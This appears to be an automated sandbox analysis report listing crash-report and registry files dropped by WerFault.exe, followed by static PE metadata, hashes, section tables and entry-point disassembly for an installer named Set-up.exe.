                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.8.8.8.<./.P.i.
                                                Process:C:\Windows\System32\WerFault.exe
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):4707
                                                Entropy (8bit):4.450734860504175
                                                Encrypted:false
                                                SSDEEP:48:cvIwWl8zs8Jg771I9VKWpW8VYGYm8M4JGBRhFCyq85KcThnnUCaOUEdd:uIjf6I76r7VGJGBkXsnUoUEdd
                                                MD5:27B36EDF48923111BF59DB7E39E1C6CC
                                                SHA1:6B702B4946F82CE16F4BEFB12580DB732AE02915
                                                SHA-256:62D7A56C3FD0331662FE893391E6E7CD558345991FFE70CAA2FA3DEBA598738C
                                                SHA-512:312D36E3F42C64207704909DB5D63F855B6147E6C10A87D8D7D773059142E7E632CF946E94701197410933818158B41A9A54A72738D669E80027E490B1C4FD44
                                                Malicious:false
                                                Reputation:low
                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="842228" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                Process:C:\Windows\System32\WerFault.exe
                                                File Type:Mini DuMP crash report, 14 streams, Sat May 10 06:05:42 2025, 0x1205a4 type
                                                Category:dropped
                                                Size (bytes):27606
                                                Entropy (8bit):2.126702775916403
                                                Encrypted:false
                                                SSDEEP:96:538XH5TbLbEIH9zmNEDHvi7OyHeSDsJHXnhzThikzooMx0WI0tTInCw:SVblXrvOOyHh++kLMlgH
                                                MD5:08F9187EDE3F484D65F6472389F447B6
                                                SHA1:B59EFFDF36CC9E3540C23463F63FF9C97FAC8F5D
                                                SHA-256:B1B55D5ADEE165459009216250EC8CA0B0E262FA67999AF18E3373C508CE2AA3
                                                SHA-512:B17F35704026FC512E534D626365A71FAE1AC1925082CC1ADABDFFC09C57D6481931CAB7A85CA1EC18E161CA859A195F2F4131C2103CA4B258FD3C7DE8368F0D
                                                Malicious:false
                                                Reputation:low
                                                Preview:MDMP..a..... ..........h............4...............<...........l...........T.......8...........T................e......................................................................................................eJ......@.......Lw......................T.......0......h.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Windows\System32\WerFault.exe
                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):8514
                                                Entropy (8bit):3.6975345692185995
                                                Encrypted:false
                                                SSDEEP:192:R6l7wVeJsjbN56YsI61+gmfRKpBi89b2Y2fJSm:R6lXJWbD6Yr6kgmfRm25ft
                                                MD5:FE1FA16C25A06F97AE8EE8CF527C7D7F
                                                SHA1:E7EC6CF6AA16A78A147391F994F4F73ECD8BE84E
                                                SHA-256:FF9EC082A23CB56D18AD1D4AAB5CF3DC11FF90A80A529B4FA00C7E26C277D2DC
                                                SHA-512:206E6EA39C733981A8301C02D633267D5A845B7722C758345920EB42C3042C7139C0B1166E723D87F56FEB27487CD7D9B37EF4A5D7A43A28E3F66B2948F6EB77
                                                Malicious:false
                                                Reputation:low
                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.8.8.8.<./.P.i.
                                                Process:C:\Windows\System32\WerFault.exe
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):4699
                                                Entropy (8bit):4.450967962831465
                                                Encrypted:false
                                                SSDEEP:48:cvIwWl8zs8Jg771I9VKWpW8VYJYm8M4JGBRBeFmyq85KlEyhnnUCaOUEdd:uIjf6I76r7VxJGBn5XlnnUoUEdd
                                                MD5:C21C81564E78B1299D80677BCA1AD523
                                                SHA1:4898EFA3AB15AFD859802DB579A1BF48A59B5B7E
                                                SHA-256:04E9E4F7AF550BC9F07908E1B91BB523F81F49432B24C619234E266EB839B82E
                                                SHA-512:744E36350DCA450080D5539F653630A9E2035F9D6A1014B1BDED54FE03A0F607B5D4A6408D3CEFC7C6F3BC3F60C4FA075814910C6F5E52170546C310320B9C1C
                                                Malicious:false
                                                Reputation:low
                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="842228" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                Process:C:\Windows\System32\WerFault.exe
                                                File Type:Mini DuMP crash report, 14 streams, Sat May 10 06:05:46 2025, 0x1205a4 type
                                                Category:dropped
                                                Size (bytes):27870
                                                Entropy (8bit):2.048694386452339
                                                Encrypted:false
                                                SSDEEP:96:5z8i2LTbLbEIH9zmN/Ynhi7OA0uFaqXk42+b617fZfY/4kyXN0EWWIGbIPBbAKiN:+9blBhOOA9QqXkr+i7fZfN90zBc/u4
                                                MD5:15360BCC2747DF01864B5A7E82962251
                                                SHA1:4D0BE94F9067F281B2224073A158AAF53D698F6A
                                                SHA-256:8678F709A5C579500B245E515CA67868D4E1A6B2E854608BC178FD98D032B69B
                                                SHA-512:9C98014DD77F00A5A577DFD23E327185B1BC6FA4F3DB0B8AB2A4A58FC5C3DB696B8F65ED8E1833EC25131D30B53A293E704C3C32F82CF8768F648E9FE7912AD7
                                                Malicious:false
                                                Reputation:low
                                                Preview:MDMP..a..... ..........h............4...............<...........l...........T.......8...........T...............>f......................................................................................................eJ......@.......Lw......................T..............h.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Windows\System32\WerFault.exe
                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):8518
                                                Entropy (8bit):3.6993790250630414
                                                Encrypted:false
                                                SSDEEP:192:R6l7wVeJr5NW6Ys46D3gmfcBTpBN89bSN/f9Gm:R6lXJVs6Y76D3gmfcB2S1fl
                                                MD5:6A032F6028670B4F296378E729261EFA
                                                SHA1:C398280E8DB3A665D27F8C7479B9F0912E480E0B
                                                SHA-256:568073C02205DC6FE6A694AC3A1D8808FC306751CF5A4B69E5DB217D172547DB
                                                SHA-512:2FA87D4143FC808FDF262713D876ED628DF0023BDFACD13F068937E28B87B317F6715C4C0CCA4C705F462B02FB235C4571BD3DE5D36F752DA52C9EA1998A39C9
                                                Malicious:false
                                                Reputation:low
                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.6.9.2.<./.P.i.
                                                Process:C:\Windows\System32\WerFault.exe
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):4707
                                                Entropy (8bit):4.450995628690019
                                                Encrypted:false
                                                SSDEEP:48:cvIwWl8zs8Jg771I9VKWpW8VYmYm8M4JGBRhFzyq85KcQnnUCaOUIdd:uIjf6I76r7V+JGBlXpnUoUIdd
                                                MD5:FC411097838CBFCF825CD6F09A789E8B
                                                SHA1:8589FA8261DCBD4F8AD72D2F48FB866012883B8B
                                                SHA-256:44E3604EE6C77F3E0CEBB86370ADDCD5EED52CF5ED26DEC335BAE9B531CE5D79
                                                SHA-512:3C6008BAEB2D29D9C4040B441745D4AB7FAEE537206E53F2103C56D3A6FC7ADE3AC7BB4ED97A2D89E8A0437B7BE7A81896F673EB243B74E0FD535D26C9D9CDB6
                                                Malicious:false
                                                Reputation:low
                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="842228" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                Process:C:\Windows\System32\WerFault.exe
                                                File Type:Mini DuMP crash report, 14 streams, Sat May 10 06:05:47 2025, 0x1205a4 type
                                                Category:dropped
                                                Size (bytes):27734
                                                Entropy (8bit):2.127979220829511
                                                Encrypted:false
                                                SSDEEP:96:5O8KNTbLbEIH9zmN26Iui7OrQ3b62cb8L7fZZ8ZhRiZ/LtoMx0WItQxInC9W:DEblluOOrQBcC7fZGg+MMhC9
                                                MD5:ACE490B0A3870E723F47B2B9A02AF2CE
                                                SHA1:566C702EB673658E6822649CBBFD0EE35B15AFEF
                                                SHA-256:89EE3162767C4F2370062E8BC5BA8D4E487E0C4F1389C4CF6071A502AFC27349
                                                SHA-512:B5C93BCD0FBBD51C4C7A49225ED38D7B5C7A8E68DE208FCC46ECD61B92A0CED4023920FD24739AE8F8AE52CF54751983DBD377AE902BCF5EB09DBB957183D961
                                                Malicious:false
                                                Reputation:low
                                                Preview:MDMP..a..... ..........h............4...............<...........l...........T.......8...........T...............Vf......................................................................................................eJ......@.......Lw......................T..............h.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Windows\System32\WerFault.exe
                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):8510
                                                Entropy (8bit):3.698436395971834
                                                Encrypted:false
                                                SSDEEP:192:R6l7wVeJrEN16YsJ6D3gmfRKpBi89bbN/f0uJm:R6lXJYP6YK6D3gmfRmb1fY
                                                MD5:AC52F6CBF11208033FB28D55CB5E16C7
                                                SHA1:3DBA4F9B198631C53198102F335AD69ADFB49D4F
                                                SHA-256:FF72E980FA35368AAB94DDB586D90FD5B04B1729A9AC10E5381315F85CC8B438
                                                SHA-512:11369578457260C375A687035647AEAFEC8196D7309047656E2A5385706FF6ECA8FF68CA58264ED7FAA4BF154B446F06B072025CD9F67768AE9EA29D7D687064
                                                Malicious:false
                                                Reputation:low
                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.6.9.2.<./.P.i.
                                                Process:C:\Windows\System32\WerFault.exe
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):4699
                                                Entropy (8bit):4.44615603020562
                                                Encrypted:false
                                                SSDEEP:48:cvIwWl8zs8Jg771I9VKWpW8VY3Ym8M4JGBRBeFpyq85KlEvnnUCaOUIdd:uIjf6I76r7VTJGBnGXlanUoUIdd
                                                MD5:3E4BF41FED0D1F0CA0522BBF0F24B891
                                                SHA1:36786A60F17D24E0926FC1BBE2D40BB7CC72A8F8
                                                SHA-256:7CD93A32B01BC4C4A8B484B21339206BB3C6D1E3054AA2F7B5D0532CF1B56415
                                                SHA-512:519E6F776F508DC208B2A40A8EDA10A427678D92BA239B263DA6024C6E973DC805016464D86C5FD7CA3CDE28C8498C0A90C4A393181DD3A8D155E3AEAF478E4A
                                                Malicious:false
                                                Reputation:low
                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="842228" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                Process:C:\Windows\System32\WerFault.exe
                                                File Type:MS Windows registry file, NT/2000 or above
                                                Category:dropped
                                                Size (bytes):1835008
                                                Entropy (8bit):4.466202941697554
                                                Encrypted:false
                                                SSDEEP:6144:YIXfpi67eLPU9skLmb0b4QWSPKaJG8nAgejZMMhA2gX4WABTVuNhdwBCswSbT:NXD94QWlLZMM6YzUj+T
                                                MD5:7B280D951647FDD18CD951B7CCD7A997
                                                SHA1:99C2A0089BC1E91ADB6E5EC834CC59136D65F94E
                                                SHA-256:FD63C053FC8C71C211041AC42C7BD6454BC9260C22D7ED1C318DABFA1F302A6A
                                                SHA-512:0129735698EC773B899532B5FECA422E8A08945DAF1CCC8BEC32B0E6EA35E7997D6FB66E4CAF131EBC6EF92973E32D096C20DFCDBB9CF66BAEC3B4FBE3633B51
                                                Malicious:false
                                                Reputation:low
                                                Preview:regf?...?....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.^9.q...............................................................................................................................................................................................................................................................................................................................................9./.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                Entropy (8bit):6.756655906156863
                                                TrID:
                                                • Win32 Executable (generic) a (10002005/4) 99.53%
                                                • InstallShield setup (43055/19) 0.43%
                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                • DOS Executable Generic (2002/1) 0.02%
                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                File name:Set-up.exe
                                                File size:25'181'696 bytes
                                                MD5:93704dcb189997351ec039c6e5f1aa41
                                                SHA1:d1bcc20f331f881d46cae1a13b281c127d9d6ae0
                                                SHA256:6be08c94108deb529fc50d4fd76c1a71e4a1329cbc618d550dccde597dc4f09e
                                                SHA512:5a24b9e04052badc44cee42cf8516b37256dc6af937f8594c3d86a5a821ed3857bf0e3b403d6df9ecd62d39fdb0693a629348912a619698e35b48e7b05516ba3
                                                SSDEEP:393216:7597Jjobwtg8j0Cu44SY4WiacYatTGcRSVtdNjLtp32rG:58bwW8ZyVVtdlLtpa
                                                TLSH:91478D43B3C4543ED0671A3A683B96A0AD3FFE116E228A4737AC3D5C5FB5640393A647
                                                File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                Icon Hash:176155849455330e
                                                Entrypoint:0x143ab94
                                                Entrypoint Section:.itext
                                                Digitally signed:true
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, DEBUG_STRIPPED, BYTES_REVERSED_HI
                                                DLL Characteristics:
                                                Time Stamp:0x55C4BDEB [Fri Aug 7 14:17:15 2015 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:5
                                                OS Version Minor:0
                                                File Version Major:5
                                                File Version Minor:0
                                                Subsystem Version Major:5
                                                Subsystem Version Minor:0
                                                Import Hash:f40af903c804980b0d67c326cebd69b3
                                                Signature Valid:
                                                Signature Issuer:
                                                Signature Validation Error:
                                                Error Number:
                                                Not Before, Not After
                                                  Subject Chain
                                                    Version:
                                                    Thumbprint MD5:
                                                    Thumbprint SHA-1:
                                                    Thumbprint SHA-256:
                                                    Serial:
                                                    Instruction
                                                    push ebp
                                                    mov ebp, esp
                                                    add esp, FFFFFFECh
                                                    push ebx
                                                    xor eax, eax
                                                    mov dword ptr [ebp-14h], eax
                                                    mov eax, 0140BC58h
                                                    call 00007F9FB7B3AFE3h
                                                    mov ebx, dword ptr [014850BCh]
                                                    xor eax, eax
                                                    push ebp
                                                    push 0143AC40h
                                                    push dword ptr fs:[eax]
                                                    mov dword ptr fs:[eax], esp
                                                    mov eax, dword ptr [ebx]
                                                    call 00007F9FB7DE27A4h
                                                    mov eax, dword ptr [ebx]
                                                    mov dl, 01h
                                                    call 00007F9FB7DE44E3h
                                                    lea edx, dword ptr [ebp-14h]
                                                    mov eax, dword ptr [01483D48h]
                                                    call 00007F9FB7B39EBEh
                                                    mov edx, dword ptr [ebp-14h]
                                                    mov eax, dword ptr [ebx]
                                                    call 00007F9FB7DE21B4h
                                                    mov ecx, dword ptr [01485424h]
                                                    mov eax, dword ptr [ebx]
                                                    mov edx, dword ptr [01085B4Ch]
                                                    call 00007F9FB7DE2789h
                                                    mov ecx, dword ptr [01482B0Ch]
                                                    mov eax, dword ptr [ebx]
                                                    mov edx, dword ptr [00E42DC4h]
                                                    call 00007F9FB7DE2776h
                                                    call 00007F9FB8AEAB85h
                                                    mov ecx, dword ptr [01484038h]
                                                    mov eax, dword ptr [ebx]
                                                    mov edx, dword ptr [013B9138h]
                                                    call 00007F9FB7DE275Eh
                                                    mov eax, dword ptr [ebx]
                                                    call 00007F9FB7DE28B3h
                                                    xor eax, eax
                                                    pop edx
                                                    pop ecx
                                                    pop ecx
                                                    mov dword ptr fs:[eax], edx
                                                    push 0143AC47h
                                                    lea eax, dword ptr [ebp-14h]
                                                    call 00007F9FB7B35466h
                                                    ret
                                                    jmp 00007F9FB7B348FCh
                                                    jmp 00007F9FB8B65582h
                                                    pop ebx
                                                    call 00007F9FB7B35180h
                                                    lea eax, dword ptr [eax+00h]
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    NameVirtual AddressVirtual Size Is in Section
                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x11a90000x92.edata
                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x11990000x619e.idata
                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x13390000x5e3200.rsrc
                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x2a83cf440x6140
                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x11ac0000x18c998.reloc
                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_TLS0x11ab0000x18.rdata
                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IAT0x119a1f00xef8.idata
                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x11a00000x873a.didata
                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                    .text0x10000x102e6ac0x102e800f8e428436f1d7e5dc77bb4bf3dbd74d7unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                    .itext0x10300000xac500xae00d24957f058c2cbcabe470b62ea42d4c0False0.4983836206896552data6.44795831227972IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                    .data0x103b0000x4b8480x4ba00e9b583f39f04c2861588ed40b9ada227False0.32120674070247934data4.9865086470398285IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .bss0x10870000x111f5c0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .idata0x11990000x619e0x6200ac9c9c183f7007799aee4fe0540fe868False0.29994419642857145data5.522490176718458IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .didata0x11a00000x873a0x88001e896af8060d0fd20998b3fc940891eeFalse0.24457146139705882data5.127167323177517IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .edata0x11a90000x920x200a2e14efb7d4f6bd7611abf3b2b3a2b5dFalse0.2578125data1.8840316901530774IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .tls0x11aa0000x6700x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
